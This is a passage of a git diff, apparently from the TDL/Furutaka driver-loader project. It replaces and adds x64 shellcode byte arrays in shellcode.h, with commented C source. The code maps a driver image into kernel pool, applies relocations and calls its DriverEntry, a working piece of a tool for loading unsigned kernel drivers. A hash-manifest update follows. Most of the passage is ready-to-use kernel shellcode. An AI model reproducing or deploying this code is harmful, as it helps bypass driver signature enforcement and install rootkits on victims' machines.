+ ZwClose(th); + } } */ -static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, +const unsigned char TDLBootstrapLoader_code[480] = { + 0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10, + 0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89, + 0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA, + 0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x4C, + 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, + 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81, + 0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0, + 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00, + 0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B, + 0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24, + 0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0, + 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88, + 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48, + 0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F, + 0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00, + 0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, + 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C, + 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, + 0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3 +}; + + +/* +* TDLBootstrapLoader_w10rs2 +* +* Purpose: +* +* Main part of shellcode used to execute driver code since w10rs2. +* +*/ +/* +void TDLBootstrapLoader_w10rs2( + PfnExAllocatePoolWithTag ExAllocatePoolWithTag +) +{ + ULONG_PTR pos, exbuffer, + Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH; + + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); + + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + + PfnDriverEntry DriverEntry; + + ULONG isz = popth->SizeOfImage; + + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } + + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + + DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint); + DriverEntry(); +} +*/ + +static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = { + 0x40, 0x53, 0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50, + 0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, + 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D, + 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10, + 0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05, + 0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE, + 0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00, + 0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72, + 0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, + 0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48, + 0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF, + 0xE0 }; diff --git a/TDL.sha256 b/TDL.sha256 index 8a8ffcf..fd98132 100644 --- a/TDL.sha256 +++ b/TDL.sha256 @@ -1,32 +1,32 @@ -c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys -4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys -9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln -01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj +a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys +f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys +bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe +14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln +d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user -da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln -2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj +4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c +14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln +f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user -a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c -cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h +1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c +f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln -16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj +656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user -1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h +9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h -c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c +2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c 8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h -2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc -f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h +2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc +6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h